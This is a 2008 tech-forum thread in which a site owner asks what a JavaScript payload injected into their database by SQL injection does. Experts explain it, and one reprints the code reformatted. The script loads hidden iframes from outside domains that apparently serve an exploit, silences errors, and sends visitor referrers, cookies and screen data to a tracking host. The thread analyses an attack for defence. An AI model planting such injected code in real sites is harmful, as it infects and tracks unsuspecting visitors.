Solved

sql injection js script, can someone tell me what this is doing?

Posted on 2008-06-09
3
929 Views
Last Modified: 2008-06-10
Our SQL Server DB was infected with some sort of SQL injection - I downloaded th .js and it is as follows:

document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");

if (navigator.systemLanguage=='zh-cn')
{

}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}



window.onerror=function(){return true};
document.write ('<script>var a3327tf="51la";var a3327pu="";var a3327pf="51la";var a3327su=window.location;var a3327sf=document.referrer;var a3327of="";var a3327op="";var a3327ops=1;var a3327ot=1;var a3327d=new Date();var a3327color="";if (navigator.appName=="Netscape"){a3327color=screen.pixelDepth;} else {a3327color=screen.colorDepth;}<\/script><script>a3327tf=top.document.referrer;<\/script><script>a3327pu =window.parent.location;<\/script><script>a3327pf=window.parent.document.referrer;<\/script><script>a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3327ops=(a3327ops==null)?1: (parseInt(unescape((a3327ops)[2]))+1);var a3327oe =new Date();a3327oe.setTime(a3327oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3327ops+ ";path=/;expires="+a3327oe.toGMTString();a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3327ot==null){a3327ot=1;}else{a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3327ot+";path=/;expires="+a3327oe.toGMTString();<\/script><script>a3327of=a3327sf;if(a3327pf!=="51la"){a3327of=a3327pf;}if(a3327tf!=="51la"){a3327of=a3327tf;}a3327op=a3327pu;try{lainframe}catch(e){a3327op=a3327su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');<\/script>');

Could someone tell me exactly what this is doing?

Thanks in advance.
0
Comment
Question by:samic400
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
3 Comments
 
LVL 6

Expert Comment

by:ysfx
ID: 21744909
Looks like code that sites use to track traffic from a different domain. My guess that this an attempt to circumvent sites that publish user inputs like blogs and feedbacks.
0
 
LVL 3

Accepted Solution

by:
NizzeK earned 500 total points
ID: 21748375
You are not alone with this problem:
http://www.daniweb.com/forums/post614041.html
This is a Chinese attempt to gather information for malicious use.
See: http://www.sudosecure.net/archives/83

The code checks you pages and creates cookies (AJSTAT_ok_pages/AJSTAT_ok_times) with time stamp and availability information. Then it is printed in disguise of a utility, sending the collected information and identity to the data collector at web.51.la.
The code itself is not harmful, but it could reveal something unwanted.
I have reformatted the code to see the structure easier.

Best regards
Nils


document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");
 
if (navigator.systemLanguage=='zh-cn')
{
 
}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}
 
window.onerror=function(){return true};
document.write ('
	<script>
		var a3327tf="51la";
		var a3327pu="";
		var a3327pf="51la";
		var a3327su=window.location;
		var a3327sf=document.referrer;
		var a3327of="";
		var a3327op="";
		var a3327ops=1;
		var a3327ot=1;
		var a3327d=new Date();
		var a3327color="";
		if (navigator.appName=="Netscape")
			     {a3327color=screen.pixelDepth;} 
			else {a3327color=screen.colorDepth;}
	<\/script>
	<script>
		a3327tf=top.document.referrer;
	<\/script>
	<script>
		a3327pu =window.parent.location;
	<\/script>
	<script>
		a3327pf=window.parent.document.referrer;
	<\/script>
	<script>
		a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));
		a3327ops=(a3327ops==null)?1:(parseInt(unescape((a3327ops)[2]))+1);
		var a3327oe =new Date();
		a3327oe.setTime(a3327oe.getTime()+60*60*1000);
		document.cookie="AJSTAT_ok_pages="+a3327ops+ ";
			path=/;
			expires="+a3327oe.toGMTString();
		a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));
		if (a3327ot==null)
			     {a3327ot=1;}
			else {a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}
		a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);
		document.cookie="AJSTAT_ok_times="+a3327ot+";
			path=/;
			expires="+a3327oe.toGMTString();
	<\/script>
	<script>
		a3327of=a3327sf;
		if (a3327pf!=="51la")
			     {a3327of=a3327pf;}
		if(a3327tf!=="51la")
			     {a3327of=a3327tf;}
		a3327op=a3327pu;
		try{lainframe}catch(e){a3327op=a3327su;}
		document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'
			+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'
			+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');
	<\/script>');

Open in new window

0
 
LVL 3

Expert Comment

by:NizzeK
ID: 21748394
But to start with, it gets page 456.htm, and that one has the malicious 4562.swf, see more:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527?logdate=200808
0

Featured Post

Salesforce Made Easy to Use

On-screen guidance at the moment of need enables you & your employees to focus on the core, you can now boost your adoption rates swiftly and simply with one easy tool.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

In this article, we'll look how to sort an Array in JavaScript, including the more advanced techniques of sorting a collection of records either ascending or descending on two or more fields. Basic Sorting of Arrays First, let's look at the …
In my daily work (mainly using ASP.net), I need to write a lot of JavaScript code. One of the most repetitive tasks I do are the jQuery Ajax calls. You know: (CODE) I don't know if for you it's the same, but for me is soooo tedious to write the …
The viewer will learn the basics of jQuery, including how to invoke it on a web page. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery.: (CODE)
The viewer will learn the basics of jQuery including how to code hide show and toggles. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery…
Suggested Courses

630 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question